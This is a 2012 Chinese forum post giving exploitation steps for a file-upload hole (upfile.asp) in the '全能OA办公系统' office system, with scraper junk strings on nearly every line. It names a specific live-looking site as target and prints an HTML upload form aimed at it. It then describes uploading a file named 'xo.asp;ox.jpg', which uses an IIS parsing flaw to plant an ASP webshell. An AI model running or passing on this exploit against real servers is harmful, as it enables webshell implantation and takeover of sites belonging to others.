全能OA办公系统 上传漏洞/ }0 V% s0 m) f6 f# m6 z0 L
; a9 }0 a" U$ f) o6 r系统介绍:
. {! v0 ^$ i5 X
& j; E: l9 E5 k, S& S/ u4 s4 m全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
+ {/ r9 m" f( x0 T q' s( [. M' [$ ~& {
主要功能:2 y7 s. s2 T: n
公司通告 + @% N; a0 b% _
工作计划
) i- ?3 v8 X3 n( G# j* k Y3 \& ~通讯助理 0 X. e' @+ W+ h7 \
客户资源
4 J7 X/ u+ x2 R" z9 N) t' o我的公文
- X J7 `" f u公文传阅
# K; m# K- l! Y! C7 A1 ~1 u d公共资源 8 m. X+ P& x0 i) s
资源预约
+ A1 P" J2 [ ]8 T* T6 \: L% f今日考勤
& Z0 r7 I( K0 } m4 A7 M个人计划
- d9 _/ E b' V个人通讯录 $ P3 _0 N, e' n/ G
个人基本档案 6 k, N1 f8 s }/ O# a6 Y( @3 c
未读邮件
/ A+ R0 A: [; K发邮件 . W. [ b$ |) M! {$ P' Y
收件夹
* w4 O: p% I- n5 X寄件夹 / U3 }, [2 W& n2 M9 `* c
网络硬盘
9 _" y5 q' V8 Q6 e& p网络会议 . Y! I! {, c- K1 [+ {
网络调查 6 F8 z1 s0 t; u# l9 u7 z
交流论坛4 m/ V9 c8 B' ~/ X' z6 w
8 C! ~3 o/ k2 j v4 ]) Q3 H有兴趣测试的朋友可以下源码看看) J3 M8 l) X& Y6 L$ g6 c1 [
8 E+ s3 b9 N. V9 D, C
源码下载:
2 c b4 H: s. S/ m1 l5 R* K- c' d+ x6 M! |" l# j
http://www.mycodes.net/30/4750.htm
7 l4 X0 m8 m6 b1 b; H# w7 }4 u5 q, i
% F6 m: m$ M9 W+ ~# W% Z漏洞介绍:- }+ P, N% j. |4 K3 }
' v: V+ w$ f: V; c" M: K
由upfile.asp上传文件漏洞引起, q' ]6 {. e9 S1 I
* U( i4 b" m0 Y0 k5 H9 Q. ]8 B测试方法:# A2 y1 O3 A5 j
' {% E& Q. r0 P% A8 @- V使用名小子上传http://www.itlynn.com/upfile.asp即可
# ^2 K# ]7 |# Y8 t$ Z: A& o! J9 Z% ?' m4 b( g, j7 A
如果upfile.asp文件被删除不存在。8 Q, R' Q6 L2 a! P5 B
% R) c/ r# e' D& ~, O0 D- b 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。' b, l7 ~0 b$ t5 X6 x0 J ]8 y
/ `% K7 o& q3 P- |, P( R如果存在那么将如下代码保存为upfile.html。
8 s }: o z: H1 A% F% n$ ]7 w* `( v6 H; @" _+ |0 Z s3 j
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
- z2 n- I9 P3 K' b' }2 t. `, F" z( g- T! F( Y7 l) n
4 W& T# Y1 n' t4 g) d1 u
" U$ M k; n! r' x01 <table border='0' align="center" cellpadding="5"> ( V# r' J: Y8 [& G
& u: T- e$ P& d$ L A7 `02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
( S$ N) R/ p) b" B. }- B7 q- e3 z9 |$ }) ^! f# O& l
03 <tr> 3 x3 d7 e7 h+ Y8 `' N6 G$ n
& {7 T% Z7 T' V( l
04 <td>报错:</td> # W3 K, M: i4 ]5 M
: o: K! w7 l- r7 [) b* Y( k4 w( H7 U
05 <td><input type='radio' name='errnumber' value='0'> 8 V8 v9 f. C9 j! {. ]+ @8 J! i
% C/ E( }3 T5 l8 H1 P06 自动更名 1 l( K" U+ O9 V4 C, i( E# S& n8 v
" _+ W `9 y v) [& t% t$ ], k
07 <input type='radio' name='errnumber' value='1' checked> . s6 Y& U- F- S* e7 y
0 }4 t/ ?; V, M4 k0 c08 报错方式 8 X1 V1 }( h _1 G$ N# |. q+ q. Q6 j
$ \) x9 D E. V1 R, s09 <input type='radio' name='errnumber' value='2'>
! s& C3 J% \% R5 R" u0 K
( r$ S+ h( E9 J& W10 直接覆盖</td>
9 t) e2 T) [! H
, z8 t" q+ H i6 l4 _11 </tr> ( D; l6 E. L8 z9 c: @- q$ c' w) j
, q: ]$ U. B2 v12 <tr>
d4 f% i, g/ Q$ i8 S' o8 x; I
13 <td>主题:</td> 8 ~9 W }! D8 y6 y
+ H* P+ G$ g/ v$ ?2 q! e$ P7 p14 <td><input type='text' name='filename' size='30'></td> / L: J& e' ?" K7 \4 G" W! p
1 `: B! t6 F( e6 f/ p2 p
15 </tr>
5 u1 D# \. t. t% h& r
+ \. u9 d! b+ O* C/ ~16 <tr> , k7 `- W K3 k! R& U# G
5 P! N f0 P# _% T17 <td>文件:</td>
4 l# G c$ \0 W" I
+ B% `, s2 \/ g1 \# W; J- P0 J18 <td><input type="file"name="fruit"size="30"></td> 6 K( |0 U6 ]8 C( S0 i- t9 u
, @+ Z S$ @5 x3 t3 Y5 e
19 </tr>
: `4 r( W V: q, T9 D
' G/ J u$ d) X8 ]# S" D% ~' J) c20 <tr> / E. v d6 v. ^- F
$ N) P- k1 R/ @7 Z/ g21 <td valign='top'>简介:</td> $ X& }2 A% x: K" |) c- V
9 }) d s+ c' W
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> - L( A3 f" V' h
o$ y" x3 j& p* ?: x23 </tr> & r( e/ @, N6 H7 B: m- L d
% W7 O* J' M9 q* x: a" }
24
/ N/ `, g/ q9 N0 y0 x; z- ~" N# v5 Z; _& p& u. G. @
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 7 s8 x/ l* z2 p0 v
4 u: f# c! A3 u, Q9 U26 </tr>
/ I+ U' @) W2 \; b; D- z
( ^ G; x% Q y0 h5 l% c: |( {27 </form>
/ \7 C" Q0 P- D
5 x! k' w0 m4 P5 \1 ?: a G6 ~然后打开上传一个文件名为xo.asp;ox.jpg的文件。& x4 r6 [ g5 C. K
: n; X' I) I' j) n: H
* R. @" z7 C: P- G3 O' C
* b( N; X( n* v5 v1 n8 K
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg3 u t5 q* e/ {/ F- q: T
C) Q2 z7 p7 I& q- [
此漏洞需要配合解析漏洞利用。8 U; ^: P. q7 C/ I
& _# p( u5 C) q$ I6 p& `3 c |
发表于 2012-11-21 13:45:12
收藏
支持
反对